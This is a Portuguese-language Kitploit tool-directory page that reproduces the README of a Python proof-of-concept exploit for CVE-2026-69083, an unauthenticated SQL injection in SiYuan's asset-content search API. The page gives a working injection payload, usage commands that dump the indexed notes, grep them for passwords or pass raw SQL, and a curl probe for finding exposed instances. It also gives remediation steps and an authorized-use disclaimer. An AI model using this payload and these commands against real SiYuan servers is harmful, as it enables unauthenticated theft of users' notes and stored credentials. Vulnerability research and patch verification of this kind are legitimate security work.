Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-69083_exploit — PoC em Python para o CVE-2026-69083, uma injeção SQL não autenticada no endpoint de busca de conteúdo de ativos do SiYuan. Suporta fuga via REGEXP e passagem direta de SQL bruto para despejar ativos indexados e dados SQLite anexados. | Kitploit
Ferramentas/GitHubGitHub/0xdak/cve-2026-69083_exploit
ExploraçãoExploração de Aplicações WebExfiltração de DadosTestes de PenetraçãoSegurança de Banco de Dados
GitHub0xdak/cve-2026-69083_exploit

CVE-2026-69083_exploit

PoC em Python para o CVE-2026-69083, uma injeção SQL não autenticada no endpoint de busca de conteúdo de ativos do SiYuan. Suporta fuga via REGEXP e passagem direta de SQL bruto para despejar ativos indexados e dados SQLite anexados.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 17 diasAinda não revisado

CVE-2026-69083 — Injeção SQL não autenticada no SiYuan

Injeção SQL não autenticada no SiYuan (um aplicativo de base de conhecimento em Go) por meio do endpoint de pesquisa de conteúdo de ativos.

POST /api/search/fullTextSearchAssetContent constrói uma instrução SQL bruta concatenando o valor de query controlado pelo usuário diretamente em uma cláusula REGEXP, sem escape (kernel/model/asset_content.go, assetContentFieldRegexp):

root@kitploit:~
SELECT * FROM `asset_contents_fts_case_insensitive`
WHERE (name REGEXP '<query>' OR content REGEXP '<query>') AND ext IN <types>

Uma aspa simples em query escapa do literal de string (CWE-89). Quando o SiYuan é implantado sem um código de autenticação de acesso (Conf.AccessAuthCode == ""), todo o kernel trata os chamadores como administrador, sem credenciais, portanto a injeção é totalmente não autenticada. method:3 é a quebra do REGEXP; method:2 adicionalmente passa query como uma instrução SQL bruta.

  • Afetado: SiYuan < 3.7.3
  • Porta padrão: 6806 (não autenticado quando nenhum accessAuthCode está definido)
  • CWE: 89 (Injeção de SQL)
  • Impacto: acesso de leitura/escrita ao banco SQLite do conteúdo de ativos (exfiltração de dados; ATTACH DATABASE para outros arquivos SQLite) — por exemplo, despejar credenciais que operadores indexaram em notas

Requisitos

Apenas a biblioteca padrão do Python 3 — sem dependências.

Uso

root@kitploit:~
# dump the asset-content index (method 3 REGEXP break-out)
python3 exploit.py http://10.10.10.10:6806/

# only rows matching a keyword
python3 exploit.py http://10.10.10.10:6806/ --grep password

# method 2 raw SQL passthrough (select the 7 columns id,name,ext,path,size,updated,content)
python3 exploit.py http://10.10.10.10:6806/ \
  --sql "SELECT id,name,ext,path,size,updated,content FROM asset_contents_fts_case_insensitive"

Como funciona

O payload padrão é:

root@kitploit:~
query = "zzqx') OR 1=1 -- "
  • zzqx') fecha o grupo (name REGEXP '...',
  • OR 1=1 faz com que a cláusula WHERE seja sempre verdadeira,
  • -- comenta o restante da linha, incluindo o AND ext IN <types> final — que, caso contrário, é um erro de sintaxe quando types está vazio (o SiYuan emite AND ext IN com nada depois, e o kernel silenciosamente retorna nenhuma linha em um erro de SQL).

O endpoint então retorna todas as linhas do índice de conteúdo de ativos, e a ferramenta imprime o content de cada linha.

Identificando um alvo

root@kitploit:~
curl -s http://10.10.10.10:6806/system_stats  # or browse http://10.10.10.10:6806/ (no login prompt)

Uma instância do SiYuan na porta 6806 que carrega sem um código de autenticação de acesso é explorável.

Remediação

  • SiYuan ≥ 3.7.3 parametriza a consulta REGEXP (... REGEXP ?) e protege o caminho raw-SQL do method-2 com uma verificação de administrador.
  • Sempre execute o SiYuan com um --accessAuthCode; nunca o exponha sem autenticação — sem um código de autenticação de acesso, toda a API do kernel fica aberta como administrador.
  • Não armazene credenciais em texto puro em notas/ativos indexados.

Isenção de responsabilidade

Apenas para testes de segurança autorizados e educação. Use-o somente contra sistemas que você possui ou para os quais tem permissão explícita para testar.

Baixar ferramenta